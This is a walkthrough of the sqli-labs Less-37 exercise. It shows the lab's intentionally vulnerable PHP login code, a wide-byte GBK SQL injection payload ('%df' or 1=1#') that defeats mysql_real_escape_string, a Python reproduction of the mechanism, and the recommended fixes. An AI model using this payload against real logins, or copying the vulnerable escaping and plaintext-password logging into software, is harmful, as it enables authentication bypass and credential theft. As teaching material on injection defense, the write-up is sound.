Less-37
Let's look at the source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-37- MySQL_real_escape_string</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username : <input type="text" name="uname" value=""/> </div>
<div> Password : <input type="text" name="passwd" value=""/> </div></br>
<div style=" margin-top:9px;margin-left:90px;"> <input type="submit" name="submit" value="Submit" /> </div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="3" color="#FFFF00">
<center>
<br> <br> <br>
<img src="../images/Less-37.jpg" />
</center>
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname1=$_POST['uname'];
    $passwd1=$_POST['passwd'];
    //echo "username before addslashes is :".$uname1 ."<br>";
    //echo "Input password before addslashes is : ".$passwd1. "<br>";

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname1);
    fwrite($fp,'Password:'.$passwd1."\n");
    fclose($fp);

    $uname = mysql_real_escape_string($uname1);
    $passwd= mysql_real_escape_string($passwd1);
    //echo "username after addslashes is :".$uname ."<br>";
    //echo "Input password after addslashes is : ".$passwd;

    // connectivity
    // SET NAMES changes the server-side charset only; the client library is not
    // told, so mysql_real_escape_string() above still escaped byte by byte.
    mysql_query("SET NAMES gbk");
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in\n\n " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg" />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
</br> </br> </br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: The Username you input is escaped as : ".$uname ."<br>";
echo "Hint: The Password you input is escaped as : ".$passwd ."<br>";
?>
</font>
</div>
</body>
</html>
Filter function:
$uname = mysql_real_escape_string($uname1);
$passwd= mysql_real_escape_string($passwd1);
SQL statement:
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
The detail that matters sits between the two: mysql_query("SET NAMES gbk"); is run right before the query, so the server decodes the query as GBK while the escaping has already been done byte by byte.
Given the filter function and the SQL statement above, we go straight to the wide-byte variant of the universal password we have used before:
username: %df' or 1=1#
password: aaa
Here %df is the single raw byte 0xDF in the POST body (it cannot be typed into the form, where it would be sent as %25df; submit it URL-encoded through a proxy or hackbar). The page renders that byte as a replacement character, which is why it looks garbled in some write-ups. Why it works: mysql_real_escape_string() turns the quote into \' , so the escaped username starts with the bytes DF 5C 27. After SET NAMES gbk the server reads the query as GBK, in which 0xDF is a lead byte and DF 5C is a valid two-byte character. The backslash is swallowed into that character, the quote that follows is live, and the remaining  or 1=1# runs as SQL, so the first row of users is returned and the page prints its username and password.
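The following is an added example, not part of the original write-up or of the sqli-labs source, that reproduces the mechanism above with nothing but Python's codecs. It models mysql_real_escape_string() as byte-by-byte escaping (the behaviour when the client library still believes the connection charset is single-byte), builds the Less-37 query, decodes it as GBK the way the server does after SET NAMES gbk, and reads the username literal back with a small lexer. The function escape_charset_aware is an assumption for illustration (decode in the connection charset first, then escape whole characters), not MySQL's internal algorithm; its point is that a dangling 0xDF lead byte is rejected before it can ever pair with a backslash.

```python
# Added example, not part of the original Less-37 write-up or the sqli-labs code.
# Assumption: the client library escapes byte by byte (single-byte connection
# charset), while the server decodes the finished query as GBK.

# Characters MySQL treats specially inside a string literal and their escapes.
SPECIALS = {
    "\\": "\\\\", "'": "\\'", '"': '\\"',
    "\x00": "\\0", "\n": "\\n", "\r": "\\r", "\x1a": "\\Z",
}

# Constructed attacker input: raw byte 0xDF (sent as %df in the POST body) + "' or 1=1#".
PAYLOAD_UNAME = b"\xdf' or 1=1#"
PASSWD = b"aaa"


def escape_bytewise(data: bytes) -> bytes:
    """mysql_real_escape_string() as it behaves when the client library believes
    the connection charset is single-byte: each byte is examined on its own, so
    0xDF passes through untouched and the quote becomes \\'."""
    out = []
    for b in data:
        ch = chr(b)                      # latin-1 view: one byte == one char
        out.append(SPECIALS.get(ch, ch))
    return "".join(out).encode("latin-1")


def escape_charset_aware(data: bytes, charset: str = "gbk") -> bytes:
    """Illustrative charset-aware escaping (an assumption for this example, not
    MySQL's internal algorithm): strictly decode the input in the connection
    charset first, so a lone lead byte such as 0xDF followed by a quote raises
    UnicodeDecodeError instead of being left to pair with the backslash later;
    then escape whole characters and re-encode."""
    text = data.decode(charset)          # strict decoding
    return "".join(SPECIALS.get(c, c) for c in text).encode(charset)


def build_query(uname: bytes, passwd: bytes, escape) -> bytes:
    """Mirror the Less-37 query: the escaped values are interpolated as bytes."""
    return (b"SELECT username, password FROM users WHERE username='"
            + escape(uname) + b"' and password='" + escape(passwd)
            + b"' LIMIT 0,1")


def decode_as_server(query: bytes) -> str:
    """After SET NAMES gbk the server interprets the query bytes as GBK."""
    return query.decode("gbk")


def string_literal_after(decoded_query: str, marker: str) -> str:
    """Read the SQL string literal that follows `marker` the way a lexer does:
    a backslash escapes the next character, the first unescaped quote ends it."""
    i = decoded_query.index(marker) + len(marker)
    if decoded_query[i] != "'":
        raise ValueError("expected a quoted literal after " + marker)
    i += 1
    chars = []
    while i < len(decoded_query) and decoded_query[i] != "'":
        if decoded_query[i] == "\\":
            i += 1                       # keep the escaped character itself
        chars.append(decoded_query[i])
        i += 1
    return "".join(chars)


def username_literal_seen_by_server(uname: bytes, escape) -> str:
    """What ends up inside the username='...' literal once the server has decoded the query."""
    query = build_query(uname, PASSWD, escape)
    return string_literal_after(decode_as_server(query), "username=")


if __name__ == "__main__":
    q = build_query(PAYLOAD_UNAME, PASSWD, escape_bytewise)
    print("escaped bytes:", escape_bytewise(PAYLOAD_UNAME))   # DF 5C 27 ...
    print("server sees  :", decode_as_server(q))
    # The literal holds a single CJK character (bytes DF 5C); everything after
    # it, " or 1=1#", has leaked into SQL context.
    print("literal      :", repr(username_literal_seen_by_server(PAYLOAD_UNAME, escape_bytewise)))
    try:
        escape_charset_aware(PAYLOAD_UNAME)
    except UnicodeDecodeError as err:
        print("charset-aware escaping rejects the input:", err)
```

Run it and compare the two escapers on a legitimate GBK name such as b"\xd5\xc5" (张): both leave it alone, and only the byte-wise one lets the %df' payload through. In the PHP of this era the practical fix was to call mysql_set_charset('gbk') instead of issuing SET NAMES through mysql_query(), so that mysql_real_escape_string() knows the real connection charset; the robust fix is to stop interpolating strings into SQL at all and use prepared statements.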
Summary: the three common ways to filter ' and \ are str_replace, addslashes and mysql_real_escape_string(). None of them is a complete defense on its own: each works on the bytes it is given, and mysql_real_escape_string() is only correct when the client library knows the real connection charset (set with mysql_set_charset(), not a SET NAMES query, which only the server sees). We need to be more rigorous when writing code, and the reliable fix is to use prepared statements rather than building SQL from escaped strings.